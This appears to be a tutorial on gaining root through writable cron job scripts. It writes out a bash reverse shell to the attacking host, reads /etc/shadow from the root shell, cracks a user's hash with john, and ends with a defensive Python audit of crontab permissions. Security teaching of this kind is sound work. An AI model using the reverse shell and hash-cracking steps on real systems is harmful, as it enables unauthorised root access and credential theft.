Cron job exploits

Attack tree

1 Become root on Linux using cron jobs
    1.1 Find cron jobs from current user that run as root and may be exploited
    1.2 Change the script or program to start a reverse shell as root
    1.3 Listen and wait for it

Example: Backup script

ssh into the target machine and look at /etc/crontab:

Last login: Sun Jun 20 10:17:43 2021 from
$ cat /etc/crontab
* * * * *  root /
* * * * *  root
* * * * *  root /home/karen/
* * * * *  root /tmp/

Karen’s backup script and the /tmp job both run as root. Use either.

On the attack machine start a listener:

└─$ nc -lnvp 4444             
Ncat: Version 7.92 ( )
Ncat: Listening on :::4444
Ncat: Listening on

Change the backup script:

$ ls
$ mv
$ touch
$ nano

Put this code in:

bash -i >& /dev/tcp/<IP address attack machine>/4444 0>&1

And make the script executable:

$ chmod +x

On the attack machine:

└─# nc -lnvp 4444
Ncat: Version 7.92 ( )
Ncat: Listening on :::4444
Ncat: Listening on
Ncat: Connection from <target IP address>.
Ncat: Connection from <target IP address>:55932.
bash: cannot set terminal process group (12785): Inappropriate ioctl for device
bash: no job control in this shell
root@target:~# python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
root@target:~# cat /etc/shadow | grep matt
cat /etc/shadow | grep matt
root@target:~# cat /etc/passwd | grep matt
cat /etc/passwd | grep matt

On the attack machine, copy matt’s /etc/shadow line into shadow.txt and his /etc/passwd line into passwd.txt, then crack the hash.

$ unshadow passwd.txt shadow.txt > crackmatt.txt

$ john --wordlist=/usr/share/wordlists/rockyou.txt crackmatt.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 512/512 AVX512BW 8x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
123456           (matt)     
1g 0:00:00:00 DONE (2022-09-25 23:30) 3.225g/s 3303p/s 3303c/s 3303C/s 123456..bethany
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Strictly speaking this is not an exploit: it only abuses files that were installed with incorrect ownership or permissions.
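The weakness behind step 1.1 (a root cron job whose script, or the directory holding it, can be changed by an ordinary user) is easy to check for from the defending side. The audit below is an added example, not part of the original notes: it parses /etc/crontab-style text, flags root jobs whose targets are writable by others, not owned by root, missing, or located in a world-writable directory, and runs against a constructed temporary fixture (all file names under it are made up) rather than the real crontab.

```python
import os
import stat
import tempfile

def parse_system_crontab(text):
    """(user, command) pairs from /etc/crontab-style text; skips comments and VAR=value lines."""
    jobs = []
    for line in (l.strip() for l in text.splitlines()):
        if not line or line[0] == "#" or "=" in line.split()[0]:
            continue
        n = 3 if line[0] == "@" else 7            # @daily-style spec vs five time fields
        parts = line.split(None, n - 1)
        if len(parts) == n:
            jobs.append((parts[-2], parts[-1]))
    return jobs

def weak_points(path, trusted_uid=0):
    """Reasons an unprivileged user could change what `path` executes (empty list = fine)."""
    reasons, st = [], None
    try:
        st = os.lstat(path)
        if st.st_uid != trusted_uid:
            reasons.append("not owned by uid %d" % trusted_uid)
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            reasons.append("writable by group/other")
    except FileNotFoundError:
        reasons.append("target missing")           # whoever creates it first wins
    parent = os.stat(os.path.dirname(path) or "/").st_mode
    # World-writable parent: a missing target can be created, an existing one replaced (no sticky bit).
    if parent & stat.S_IWOTH and (st is None or not parent & stat.S_ISVTX):
        reasons.append("parent directory world-writable")
    return reasons

def audit_crontab(text, trusted_uid=0):
    """Map each root-run command to the weaknesses of every absolute path it mentions."""
    return {cmd: [f"{t}: {r}" for t in cmd.split() if t[0] == "/" for r in weak_points(t, trusted_uid)]
            for user, cmd in parse_system_crontab(text) if user == "root"}

def demo():
    """Constructed fixture, not a real crontab: world-writable backup script, a protected one, and a job whose script is missing from a /tmp-like dir."""
    base = tempfile.mkdtemp()
    home, tmp = os.path.join(base, "karen"), os.path.join(base, "tmp")
    os.mkdir(home, 0o755)
    os.mkdir(tmp); os.chmod(tmp, 0o1777)          # sticky bit, like the real /tmp
    backup, safe, sh = os.path.join(home, "backup.sh"), os.path.join(base, "safe.sh"), os.path.join(base, "sh")
    for p, mode in ((backup, 0o777), (safe, 0o755), (sh, 0o755)):
        open(p, "w").close(); os.chmod(p, mode)
    crontab = (f"SHELL=/bin/sh\n* * * * *  root {safe}\n* * * * *  root {backup}\n"
               f"* * * * *  root {sh} {tmp}/clean.sh\n@daily karen {sh}\n")
    return audit_crontab(crontab, trusted_uid=os.getuid())   # we own the files, so our uid plays root
```

On a real host call `audit_crontab(open("/etc/crontab").read())` with the default `trusted_uid=0`; the `/tmp` case shows why a job pointing at a file that does not yet exist is as dangerous as a writable one.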